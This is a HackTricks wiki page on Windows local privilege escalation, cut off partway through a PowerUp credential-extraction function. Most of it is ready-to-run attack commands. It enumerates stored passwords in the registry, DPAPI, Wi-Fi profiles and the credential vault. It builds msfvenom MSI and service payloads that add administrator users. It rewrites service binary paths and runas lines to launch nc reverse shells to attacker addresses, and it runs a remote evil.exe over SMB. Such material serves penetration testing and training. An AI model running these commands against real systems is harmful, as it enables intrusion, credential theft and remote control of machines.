HackTricks
Search…
🤩
Generic Methodologies & Resources
🐧
Linux Hardening
🍏
MacOS Hardening
🪟
Windows Hardening
📱
Mobile Pentesting
👽
Network Services Pentesting
🕸
Pentesting Web
⛈
Cloud Security
😎
Hardware/Physical Access
🦅
Reversing & Exploiting
🔮
Crypto & Stego
🧐
External Platforms Reviews/Writeups
✍
TODO
Windows Local Privilege Escalation
Support HackTricks and get benefits!
Initial Windows Theory
Access Tokens
If you don't know what are Windows Access Tokens, read the following page before continuing:
ACLs - DACLs/SACLs/ACEs
If you don't know what is any of the acronyms used in the heading of this section, read the following page before continuing:
Integrity Levels
If you don't know what are integrity levels in Windows you should read the following page before continuing:
System Info
Version info enumeration
Check if the Windows version has any known vulnerability (check also the patches applied).
1
systeminfo
2
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" #Get only that information
3
wmic qfe get Caption,Description,HotFixID,InstalledOn #Patches
4
wmic os get osarchitecture || echo %PROCESSOR_ARCHITECTURE% #Get system architecture
Copied!
1
[System.Environment]::OSVersion.Version #Current OS version
2
Get-WmiObject -query 'select * from win32_quickfixengineering' | foreach {$_.hotfixid} #List all patches
3
Get-Hotfix -description "Security update" #List only "Security Update" patches
Copied!
Version Exploits
On the system
- post/windows/gather/enum_patches
- post/multi/recon/local_exploit_suggester
Locally with system infromation
Github repos of exploits:
Environment
Any credential/Juicy info saved in the env variables?
1
set
2
dir env:
3
Get-ChildItem Env: | ft Key,Value
Copied!
PowerShell History
1
ConsoleHost_history #Find the PATH where is saved
2
3
type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
4
type C:\Users\swissky\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
5
type $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
6
cat (Get-PSReadlineOption).HistorySavePath
7
cat (Get-PSReadlineOption).HistorySavePath | sls passw
Copied!
PowerShell Transcript files
You can learn how to turn this on in https://sid-500.com/2017/11/07/powershell-enabling-transcription-logging-by-using-group-policy/
1
#Check is enable in the registry
2
reg query HKCU\Software\Policies\Microsoft\Windows\PowerShell\Transcription
3
reg query HKLM\Software\Policies\Microsoft\Windows\PowerShell\Transcription
4
reg query HKCU\Wow6432Node\Software\Policies\Microsoft\Windows\PowerShell\Transcription
5
reg query HKLM\Wow6432Node\Software\Policies\Microsoft\Windows\PowerShell\Transcription
6
dir C:\Transcripts
7
8
#Start a Transcription session
9
Start-Transcript -Path "C:\transcripts\transcript0.txt" -NoClobber
10
Stop-Transcript
Copied!
PowerShell Module Logging
It records the pipeline execution details of PowerShell. This includes the commands which are executed including command invocations and some portion of the scripts. It may not have the entire detail of the execution and the output results.
You can enable this following the link of the last section (Transcript files) but enabling "Module Logging" instead of "Powershell Transcription".
1
reg query HKCU\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging
2
reg query HKLM\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging
3
reg query HKCU\Wow6432Node\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging
4
reg query HKLM\Wow6432Node\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging
Copied!
To view the last 15 events from PowersShell logs you can execute:
1
Get-WinEvent -LogName "windows Powershell" | select -First 15 | Out-GridView
Copied!
PowerShell Script Block Logging
It records block of code as they are executed therefore it captures the complete activity and full content of the script. It maintains the complete audit trail of each activity which can be used later in forensics and to study the malicious behavior. It records all the activity at time of execution thus provides the complete details.
1
reg query HKCU\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging
2
reg query HKLM\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging
3
reg query HKCU\Wow6432Node\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging
4
reg query HKLM\Wow6432Node\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging
Copied!
The Script Block logging events can be found in Windows Event viewer under following path: Application and Sevices Logs > Microsoft > Windows > Powershell > Operational
To view the last 20 events you can use:
1
Get-WinEvent -LogName "Microsoft-Windows-Powershell/Operational" | select -first 20 | Out-Gridview
Copied!
Internet Settings
1
reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings"
2
reg query "HKLM\Software\Microsoft\Windows\CurrentVersion\Internet Settings"
Copied!
Drives
1
wmic logicaldisk get caption || fsutil fsinfo drives
2
wmic logicaldisk get caption,description,providername
3
Get-PSDrive | where {$_.Provider -like "Microsoft.PowerShell.Core\FileSystem"}| ft Name,Root
Copied!
WSUS
You can compromise the system if the updates are not requested using httpS but http.
You start by checking if the network uses a non-SSL WSUS update by running the following:
1
reg query HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate /v WUServer
Copied!
If you get a reply such as:
1
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WindowsUpdate
2
WUServer REG_SZ http://xxxx-updxx.corp.internal.com:8535
Copied!
And if
HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate\AU /v UseWUServer is equals to 1.Then, it is exploitable. If the last registry is equals to 0, then, the WSUS entry will be ignored.
Read the research here:
CTX_WSUSpect_White_Paper.pdf
517KB
PDF
WSUS CVE-2020-1013
If we have the power to modify our local user proxy, and Windows Updates uses the proxy configured in Internet Explorer’s settings, we therefore have the power to run PyWSUS locally to intercept our own traffic and run code as an elevated user on our asset.Furthermore, since the WSUS service uses the current user’s settings, it will also use its certificate store. If we generate a self-signed certificate for the WSUS hostname and add this certificate into the current user’s certificate store, we will be able to intercept both HTTP and HTTPS WSUS traffic. WSUS uses no HSTS-like mechanisms to implement a trust-on-first-use type validation on the certificate. If the certificate presented is trusted by the user and has the correct hostname, it will be accepted by the service.
KrbRelayUp
This is essentially a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced, where the user has self rights (to configure RBCD) and where the user can create computers in the domain.
****All the requirements **** are satisfied with default settings.
Even if the attack is For more information about the flow of the attack check https://research.nccgroup.com/2019/08/20/kerberos-resource-based-constrained-delegation-when-an-image-change-leads-to-a-privilege-escalation/
AlwaysInstallElevated
If these 2 registers are enabled (value is 0x1), then users of any privilege can install (execute)
*.msi files as NT AUTHORITY\SYSTEM.1
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
2
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
Copied!
Metasploit payloads
1
msfvenom -p windows/adduser USER=rottenadmin PASS=[email protected]! -f msi-nouac -o alwe.msi #No uac format
2
msfvenom -p windows/adduser USER=rottenadmin PASS=[email protected]! -f msi -o alwe.msi #Using the msiexec the uac wont be prompted
Copied!
If you have a meterpreter session you can automate this technique using the module
exploit/windows/local/always_install_elevatedPowerUP
Use the
Write-UserAddMSI command from power-up to create inside the current directory a Windows MSI binary to escalate privileges. This script writes out a precompiled MSI installer that prompts for a user/group addition (so you will need GIU access):1
Write-UserAddMSI
Copied!
Just execute the created binary to escalate privileges.
MSI Wrapper
Read this tutorial to learn how to create a MSI wrapper using this tools. Note that you can wrap a ".bat" file if you just want to execute command lines
Create MSI with WIX
MSI Installation
To execute the installation of the malicious
.msi file in background:1
msiexec /quiet /qn /i C:\Users\Steve.INFERNO\Downloads\alwe.msi
Copied!
To exploit this vulnerability you can use: exploit/windows/local/always_install_elevated
Antivirus and Detectors
Audit Settings
These settings decide what is being logged, so you should pay attention
1
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\Audit
Copied!
WEF
Windows Event Forwarding, is interesting to know where are the logs sent
1
reg query HKLM\Software\Policies\Microsoft\Windows\EventLog\EventForwarding\SubscriptionManager
Copied!
LAPS
LAPS allows you to manage the local Administrator password (which is randomised, unique, and changed regularly) on domain-joined computers. These passwords are centrally stored in Active Directory and restricted to authorised users using ACLs. Passwords are protected in transit from the client to the server using Kerberos v5 and AES.
1
reg query "HKLM\Software\Policies\Microsoft Services\AdmPwd" /v AdmPwdEnabled
Copied!
When using LAPS, 2 new attributes appear in the computer objects of the domain: ms-msc-AdmPwd and ms-mcs-AdmPwdExpirationTime. These attributes contains the plain-text admin password and the expiration time. Then, in a domain environment, it could be interesting to check which users can read these attributes...
WDigest
If active, plain-text passwords are stored in LSASS (Local Security Authority Subsystem Service).
More info about WDigest in this page.
1
reg query HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential
Copied!
LSA Protection
Microsoft in Windows 8.1 and later has provided additional protection for the LSA to prevent untrusted processes from being able to read its memory or to inject code.
More info about LSA Protection here.
1
reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA /v RunAsPPL
Copied!
Credentials Guard
Credential Guard is a new feature in Windows 10 (Enterprise and Education edition) that helps to protect your credentials on a machine from threats such as pass the hash.
More info about Credentials Guard here.
1
reg query HKLM\System\CurrentControlSet\Control\LSA /v LsaCfgFlags
Copied!
Cached Credentials
Domain credentials are used by operating system components and are authenticated by the Local Security Authority (LSA). Typically, domain credentials are established for a user when a registered security package authenticates the user's logon data.
More info about Cached Credentials here.
1
reg query "HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON" /v CACHEDLOGONSCOUNT
Copied!
AV
Check is there is any anti virus running:
1
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List | more
2
Get-MpComputerStatus
Copied!
AppLocker Policy
Check which files/extensions are blacklisted/whitelisted.
1
Get-ApplockerPolicy -Effective -xml
2
Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections
3
$a = Get-ApplockerPolicy -effective
4
$a.rulecollections
Copied!
Useful Writable folders to bypass AppLocker Policy
1
C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys
2
C:\Windows\System32\spool\drivers\color
3
C:\Windows\Tasks
4
C:\windows\tracing
Copied!
UAC
UAC is used to allow an administrator user to not give administrator privileges to each process executed. This is achieved using default the low privileged token of the user.
More information about UAC here.
1
reg query HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\
Copied!
Users & Groups
Enumerate Users & Groups
You should check if any of the groups where you belong have interesting permissions
1
# CMD
2
net users %username% #Me
3
net users #All local users
4
net localgroup #Groups
5
net localgroup Administrators #Who is inside Administrators group
6
whoami /all #Check the privileges
7
8
# PS
9
Get-WmiObject -Class Win32_UserAccount
10
Get-LocalUser | ft Name,Enabled,LastLogon
11
Get-ChildItem C:\Users -Force | select Name
12
Get-LocalGroupMember Administrators | ft Name, PrincipalSource
Copied!
Privileged groups
If you belongs to some privileged group you may be able to escalate privileges. Learn about privileged groups and how to abuse them to escalate privileges here:
Token manipulation
Learn more about what is a token in this page: Windows Tokens.
Check the following page to learn about interesting tokens and how to abuse them:
Logged users / Sessions
1
qwinsta
2
klist sessions
Copied!
Home folders
1
dir C:\Users
2
Get-ChildItem C:\Users
Copied!
Password Policy
1
net accounts
Copied!
Get the content of the clipboard
1
powershell -command "Get-Clipboard"
Copied!
Running Processes
File and Folder Permissions
First of all, listing the processes check for passwords inside the command line of the process.
Check if you can overwrite some binary running or if you have write permissions of the binary folder to exploit possible DLL Hijacking attacks:
1
Tasklist /SVC #List processes running and services
2
tasklist /v /fi "username eq system" #Filter "system" processes
3
4
#With allowed Usernames
5
Get-WmiObject -Query "Select * from Win32_Process" | where {$_.Name -notlike "svchost*"} | Select Name, Handle, @{Label="Owner";Expression={$_.GetOwner().User}} | ft -AutoSize
6
7
#Without usernames
8
Get-Process | where {$_.ProcessName -notlike "svchost*"} | ft ProcessName, Id
Copied!
Always check for possible electron/cef/chromium debuggers running, you could abuse it to escalate privileges.
Checking permissions of the processes binaries
1
for /f "tokens=2 delims='='" %%x in ('wmic process list full^|find /i "executablepath"^|find /i /v "system32"^|find ":"') do (
2
for /f eol^=^"^ delims^=^" %%z in ('echo %%x') do (
3
icacls "%%z"
4
2>nul | findstr /i "(F) (M) (W) :\\" | findstr /i ":\\ everyone authenticated users todos %username%" && echo.
5
)
6
)
Copied!
1
for /f "tokens=2 delims='='" %%x in ('wmic process list full^|find /i "executablepath"^|find /i /v
2
"system32"^|find ":"') do for /f eol^=^"^ delims^=^" %%y in ('echo %%x') do (
3
icacls "%%~dpy\" 2>nul | findstr /i "(F) (M) (W) :\\" | findstr /i ":\\ everyone authenticated users
4
todos %username%" && echo.
5
)
Copied!
Memory Password mining
You can create a memory dump of a running process using procdump from sysinternals. Services like FTP have the credentials in clear text in memory, try to dump the memory and read the credentials.
1
procdump.exe -accepteula -ma <proc_name_tasklist>
Copied!
Insecure GUI apps
Applications running as SYSTEM may allow an user to spawn a CMD, or browse directories.
Example: "Windows Help and Support" (Windows + F1), search for "command prompt", click on "Click to open Command Prompt"
Services
Get a list of services:
1
net start
2
wmic service list brief
3
sc query
4
Get-Service
Copied!
Permissions
You can use sc to get information of a service
1
sc qc <service_name>
Copied!
It is recommended to have the binary accesschk from Sysinternals to check the required privilege level for each service.
1
accesschk.exe -ucqv <Service_Name> #Check rights for different groups
Copied!
It is recommended to check if "Authenticated Users" can modify any service:
1
accesschk.exe -uwcqv "Authenticated Users" * /accepteula
2
accesschk.exe -uwcqv %USERNAME% * /accepteula
3
accesschk.exe -uwcqv "BUILTIN\Users" * /accepteula 2>nul
4
accesschk.exe -uwcqv "Todos" * /accepteula ::Spanish version
Copied!
Enable service
If you are having this error (for example with SSDPSRV):
System error 1058 has occurred.
The service cannot be started, either because it is disabled or because it has no enabled devices associated with it.
You can enable it using
1
sc config SSDPSRV start= demand
2
sc config SSDPSRV obj= ".\LocalSystem" password= ""
Copied!
Take into account that the service upnphost depends on SSDPSRV to work (for XP SP1)
Another workaround of this problem is running:
1
sc.exe config usosvc start= auto
Copied!
Modify service binary path
If the group "Authenticated users" has SERVICE_ALL_ACCESS in a service, then it can modify the binary that is being executed by the service. To modify it and execute nc you can do:
1
sc config <Service_Name> binpath= "C:\nc.exe -nv 127.0.0.1 9988 -e C:\WINDOWS\System32\cmd.exe"
2
sc config <Service_Name> binpath= "net localgroup administrators username /add"
3
sc config <Service_Name> binpath= "cmd \c C:\Users\nc.exe 10.10.10.10 4444 -e cmd.exe"
4
5
sc config SSDPSRV binpath= "C:\Documents and Settings\PEPE\meter443.exe"
Copied!
Restart service
1
wmic service NAMEOFSERVICE call startservice
2
net stop [service name] && net start [service name]
Copied!
Other Permissions can be used to escalate privileges:
SERVICE_CHANGE_CONFIG Can reconfigure the service binary
WRITE_DAC: Can reconfigure permissions, leading to SERVICE_CHANGE_CONFIG
WRITE_OWNER: Can become owner, reconfigure permissions
GENERIC_WRITE: Inherits SERVICE_CHANGE_CONFIG
GENERIC_ALL: Inherits SERVICE_CHANGE_CONFIG
To detect and exploit this vulnerability you can use exploit/windows/local/service_permissions
Services binaries weak permissions
Check if you can modify the binary that is executed by a service or if you have write permissions on the folder where the binary is located (DLL Hijacking).
You can get every binary that is executed by a service using wmic (not in system32) and check your permissions using icacls:
1
for /f "tokens=2 delims='='" %a in ('wmic service list full^|find /i "pathname"^|find /i /v "system32"') do @echo %a >> %temp%\perm.txt
2
3
for /f eol^=^"^ delims^=^" %a in (%temp%\perm.txt) do cmd.exe /c icacls "%a" 2>nul | findstr "(M) (F) :\"
Copied!
You can also use sc and icacls:
1
sc query state= all | findstr "SERVICE_NAME:" >> C:\Temp\Servicenames.txt
2
FOR /F "tokens=2 delims= " %i in (C:\Temp\Servicenames.txt) DO @echo %i >> C:\Temp\services.txt
3
FOR /F %i in (C:\Temp\services.txt) DO @sc qc %i | findstr "BINARY_PATH_NAME" >> C:\Temp\path.txt
Copied!
Services registry modify permissions
You should check if you can modify any service registry.
You can check your permissions over a service registry doing:
1
reg query hklm\System\CurrentControlSet\Services /s /v imagepath #Get the binary paths of the services
2
3
#Try to write every service with its current content (to check if you have write permissions)
4
for /f %a in ('reg query hklm\system\currentcontrolset\services') do del %temp%\reg.hiv 2>nul & reg save %a %temp%\reg.hiv 2>nul && reg restore %a %temp%\reg.hiv 2>nul && echo You can modify %a
5
6
get-acl HKLM:\System\CurrentControlSet\services\* | Format-List * | findstr /i "<Username> Users Path Everyone"
Copied!
Check if Authenticated Users or NT AUTHORITY\INTERACTIVE have FullControl. In that case you can change the binary that is going to be executed by the service.
To change the Path of the binary executed:
1
reg add HKLM\SYSTEM\CurrentControlSet\srevices\<service_name> /v ImagePath /t REG_EXPAND_SZ /d C:\path\new\binary /f
Copied!
Services registry AppendData/AddSubdirectory permissions
If you have this permission over a registry this means to you can create sub registries from this one. In case of Windows services this is enough to execute arbitrary code:
Unquoted Service Paths
If the path to an executable is not inside quotes, Windows will try to execute every ending before a space.
For example, for the path C:\Program Files\Some Folder\Service.exe Windows will try to execute:
1
C:\Program.exe
2
C:\Program Files\Some.exe
3
C:\Program Files\Some Folder\Service.exe
Copied!
To list all unquoted service paths (minus built-in Windows services)
1
wmic service get name,displayname,pathname,startmode |findstr /i "Auto" | findstr /i /v "C:\Windows\\" |findstr /i /v """
2
wmic service get name,displayname,pathname,startmode | findstr /i /v "C:\\Windows\\system32\\" |findstr /i /v """ #Not only auto services
3
4
#Other way
5
for /f "tokens=2" %%n in ('sc query state^= all^| findstr SERVICE_NAME') do (
6
for /f "delims=: tokens=1*" %%r in ('sc qc "%%~n" ^| findstr BINARY_PATH_NAME ^| findstr /i /v /l /c:"c:\windows\system32" ^| findstr /v /c:""""') do (
7
echo %%~s | findstr /r /c:"[a-Z][ ][a-Z]" >nul 2>&1 && (echo %%n && echo %%~s && icacls %%s | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%") && echo.
8
)
9
)
Copied!
1
gwmi -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$_.StartMode -eq "Auto" -and $_.PathName -notlike "C:\Windows*" -and $_.PathName -notlike '"*'} | select PathName,DisplayName,Name
Copied!
You can detect and exploit this vulnerability with metasploit: exploit/windows/local/trusted_service_path
You can manually create a service binary with metasploit:
1
msfvenom -p windows/exec CMD="net localgroup administrators username /add" -f exe-service -o service.exe
Copied!
Recovery Actions
It's possible to indicate Windows what it should do when executing a service this fails. If that setting is pointing a binary and this binary can be overwritten you may be able to escalate privileges.
Applications
Installed Applications
Check permissions of the binaries (maybe you can overwrite one and escalate privileges) and of the folders (DLL Hijacking).
1
dir /a "C:\Program Files"
2
dir /a "C:\Program Files (x86)"
3
reg query HKEY_LOCAL_MACHINE\SOFTWARE
4
5
Get-ChildItem 'C:\Program Files', 'C:\Program Files (x86)' | ft Parent,Name,LastWriteTime
6
Get-ChildItem -path Registry::HKEY_LOCAL_MACHINE\SOFTWARE | ft Name
Copied!
Write Permissions
Check if you can modify some config file to read some special file or if you can modify some binary that is going to be executed by an Administrator account (schedtasks).
A way to find weak folder/files permissions in the system is doing:
1
accesschk.exe /accepteula
2
# Find all weak folder permissions per drive.
3
accesschk.exe -uwdqs Users c:\
4
accesschk.exe -uwdqs "Authenticated Users" c:\
5
accesschk.exe -uwdqs "Everyone" c:\
6
# Find all weak file permissions per drive.
7
accesschk.exe -uwqs Users c:\*.*
8
accesschk.exe -uwqs "Authenticated Users" c:\*.*
9
accesschk.exe -uwdqs "Everyone" c:\*.*
Copied!
1
icacls "C:\Program Files\*" 2>nul | findstr "(F) (M) :\" | findstr ":\ everyone authenticated users todos %username%"
2
icacls ":\Program Files (x86)\*" 2>nul | findstr "(F) (M) C:\" | findstr ":\ everyone authenticated users todos %username%"
Copied!
1
Get-ChildItem 'C:\Program Files\*','C:\Program Files (x86)\*' | % { try { Get-Acl $_ -EA SilentlyContinue | Where {($_.Access|select -ExpandProperty IdentityReference) -match 'Everyone'} } catch {}}
2
3
Get-ChildItem 'C:\Program Files\*','C:\Program Files (x86)\*' | % { try { Get-Acl $_ -EA SilentlyContinue | Where {($_.Access|select -ExpandProperty IdentityReference) -match 'BUILTIN\Users'} } catch {}}
Copied!
Run at startup
Check if you can overwrite some registry or binary that is going to be executed by a different user.
Read the following page to learn more about interesting autoruns locations to escalate privileges:
Drivers
Look for possible third party weird/vulnerable drivers
1
driverquery
2
driverquery.exe /fo table
3
driverquery /SI
Copied!
PATH DLL Hijacking
If you have write permissions inside a folder present on PATH you could be able to hijack a DLL loaded by a process and escalate privileges.
Check permissions of all folders inside PATH:
1
for %%A in ("%path:;=";"%") do ( cmd.exe /c icacls "%%~A" 2>nul | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%" && echo. )
Copied!
Network
Shares
1
net view #Get a list of computers
2
net view /all /domain [domainname] #Shares on the domains
3
net view \\computer /ALL #List shares of a computer
4
net use x: \\computer\share #Mount the share locally
5
net share #Check current shares
Copied!
hosts file
Check for other known computers hardcoded on the hosts file
1
type C:\Windows\System32\drivers\etc\hosts
Copied!
Network Interfaces & DNS
1
ipconfig /all
2
Get-NetIPConfiguration | ft InterfaceAlias,InterfaceDescription,IPv4Address
3
Get-DnsClientServerAddress -AddressFamily IPv4 | ft
Copied!
Open Ports
Check for restricted services from the outside
1
netstat -ano #Opened ports?
Copied!
Routing Table
1
route print
2
Get-NetRoute -AddressFamily IPv4 | ft DestinationPrefix,NextHop,RouteMetric,ifIndex
Copied!
ARP Table
1
arp -A
2
Get-NetNeighbor -AddressFamily IPv4 | ft ifIndex,IPAddress,L
Copied!
Firewall Rules
Windows Subsystem for Linux (wsl)
1
C:\Windows\System32\bash.exe
2
C:\Windows\System32\wsl.exe
Copied!
Binary
bash.exe can also be found in C:\Windows\WinSxS\amd64_microsoft-windows-lxssbash_[...]\bash.exeIf you get root user you can listen on any port (the first time you use
nc.exe to listen on a port it will ask via GUI if nc should be allowed by the firewall).1
wsl whoami
2
./ubuntun1604.exe config --default-user root
3
wsl whoami
4
wsl python -c 'BIND_OR_REVERSE_SHELL_PYTHON_CODE'
Copied!
To easily start bash as root, you can try
--default-user rootYou can explore the
WSL filesystem in the folder C:\Users\%USERNAME%\AppData\Local\Packages\CanonicalGroupLimited.UbuntuonWindows_79rhkp1fndgsc\LocalState\rootfs\Windows Credentials
Winlogon Credentials
1
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr /i "DefaultDomainName DefaultUserName DefaultPassword AltDefaultDomainName AltDefaultUserName AltDefaultPassword LastUsedUsername"
2
3
#Other way
4
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultDomainName
5
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultUserName
6
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultPassword
7
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AltDefaultDomainName
8
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AltDefaultUserName
9
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AltDefaultPassword
Copied!
Credentials manager / Windows vault
From https://www.neowin.net/news/windows-7-exploring-credential-manager-and-windows-vault
The Windows Vault stores user credentials for servers, websites and other programs that Windows can log in the users automatically. At first instance, this might look like now users can store their Facebook credentials, Twitter credentials, Gmail credentials etc., so that they automatically log in via browsers. But it is not so.
Windows Vault stores credentials that Windows can log in the users automatically, which means that any Windows application that needs credentials to access a resource (server or a website) can make use of this Credential Manager & Windows Vault and use the credentials supplied instead of users entering the username and password all the time.
Unless the applications interact with Credential Manager, I don't think it is possible for them to use the credentials for a given resource. So, if your application wants to make use of the vault, it should somehow communicate with the credential manager and request the credentials for that resource from the default storage vault.
Use the
cmdkey to list the stored credentials on the machine.1
cmdkey /list
2
Currently stored credentials:
3
Target: Domain:interactive=WORKGROUP\Administrator
4
Type: Domain Password
5
User: WORKGROUP\Administrator
Copied!
Then you can use
runas with the /savecred options in order to use the saved credentials. The following example is calling a remote binary via an SMB share.1
runas /savecred /user:WORKGROUP\Administrator "\\10.XXX.XXX.XXX\SHARE\evil.exe"
Copied!
Using
runas with a provided set of credential.1
C:\Windows\System32\runas.exe /env /noprofile /user:<username> <password> "c:\users\Public\nc.exe -nc <attacker-ip> 4444 -e cmd.exe"
Copied!
Note that mimikatz, lazagne, credentialfileview, VaultPasswordView, or from Empire Powershells module.
DPAPI
In theory, the Data Protection API can enable symmetric encryption of any kind of data; in practice, its primary use in the Windows operating system is to perform symmetric encryption of asymmetric private keys, using a user or system secret as a significant contribution of entropy.
DPAPI allows developers to encrypt keys using a symmetric key derived from the user's logon secrets, or in the case of system encryption, using the system's domain authentication secrets.
The DPAPI keys used for encrypting the user's RSA keys are stored under
%APPDATA%\Microsoft\Protect\{SID} directory, where {SID} is the Security Identifier of that user. The DPAPI key is stored in the same file as the master key that protects the users private keys. It usually is 64 bytes of random data. (Notice that this directory is protected so you cannot list it usingdir from the cmd, but you can list it from PS).1
Get-ChildItem C:\Users\USER\AppData\Roaming\Microsoft\Protect\
2
Get-ChildItem C:\Users\USER\AppData\Local\Microsoft\Protect\
Copied!
You can use mimikatz module
dpapi::masterkey with the appropriate arguments (/pvk or /rpc) to decrypt it.The credentials files protected by the master password are usually located in:
1
dir C:\Users\username\AppData\Local\Microsoft\Credentials\
2
dir C:\Users\username\AppData\Roaming\Microsoft\Credentials\
3
Get-ChildItem -Hidden C:\Users\username\AppData\Local\Microsoft\Credentials\
4
Get-ChildItem -Hidden C:\Users\username\AppData\Roaming\Microsoft\Credentials\
Copied!
You can use mimikatz module
dpapi::cred with the appropiate /masterkey to decrypt.
You can extract many DPAPI masterkeys from memory with the sekurlsa::dpapi module (if you are root).Wifi
1
#List saved Wifi using
2
netsh wlan show profile
3
#To get the clear-text password use
4
netsh wlan show profile <SSID> key=clear
5
#Oneliner to extract all wifi passwords
6
cls & echo. & for /f "tokens=4 delims=: " %a in ('netsh wlan show profiles ^| find "Profile "') do @echo off > nul & (netsh wlan show profiles name=%a key=clear | findstr "SSID Cipher Content" | find /v "Number" & echo.) & @echo on
Copied!
Saved RDP Connections
You can find them on
HKEY_USERS\<SID>\Software\Microsoft\Terminal Server Client\Servers\
and in HKCU\Software\Microsoft\Terminal Server Client\Servers\Recently Run Commands
1
HCU\<SID>\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RunMRU
2
HKCU\<SID>\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RunMRU
Copied!
Remote Desktop Credential Manager
1
%localappdata%\Microsoft\Remote Desktop Connection Manager\RDCMan.settings
Copied!
Use the Mimikatz
dpapi::rdg module with appropriate /masterkey to decrypt any .rdg files
You can extract many DPAPI masterkeys from memory with the Mimikatz sekurlsa::dpapi moduleAppCmd.exe
Note that to recover passwords from AppCmd.exe you need to be Administrator and run under a High Integrity level.
AppCmd.exe is located in the
%systemroot%\system32\inetsrv\ directory.
If this file exists then it is possible that some credentials have been configured and can be recovered.This code was extracted from PowerUP:
1
function Get-ApplicationHost {
2
$OrigError = $ErrorActionPreference
3
$ErrorActionPreference = "SilentlyContinue"
4
5
# Check if appcmd.exe exists
6
if (Test-Path ("$Env:SystemRoot\System32\inetsrv\appcmd.exe")) {
7
# Create data table to house results
8
$DataTable = New-Object System.Data.DataTable
9
10
# Create and name columns in the data table
11
$Null = $DataTable.Columns.Add("user")
12
$Null = $DataTable.Columns.Add("pass")
13
$Null = $DataTable.Columns.Add("type")
14
$Null = $DataTable.Columns.Add("vdir")
15
$Null = $DataTable.Columns.Add("apppool")
16
17
# Get list of application pools
18
Invoke-Expression "$Env:SystemRoot\System32\inetsrv\appcmd.exe list apppools /text:name" | ForEach-Object {
19
20
# Get application pool name
21
$PoolName = $_
22
23
# Get username
24
$PoolUserCmd = "$Env:SystemRoot\System32\inetsrv\appcmd.exe list apppool " + "`"$PoolName`" /text:processmodel.username"
25
$PoolUser = Invoke-Expression $PoolUserCmd
26
27
# Get password
28
$PoolPasswordCmd = "$Env:SystemRoot\System32\inetsrv\appcmd.exe list apppool " + "`"$PoolName`" /text:processmodel.password"
29
$PoolPassword = Invoke-Expression $PoolPasswordCmd
30
31
# Check if credentials exists
32
if (($PoolPassword -ne "") -and ($PoolPassword -isnot [system.array])) {
33
# Add credentials to database
34
$Null = $DataTable.Rows.Add($PoolUser, $PoolPassword,'Application Pool','NA',$PoolName)
35
}
36
}
37
38
# Get list of virtual directories
39
Invoke-Expression "$Env:SystemRoot\System32\inetsrv\appcmd.exe list vdir /text:vdir.name" | ForEach-Object {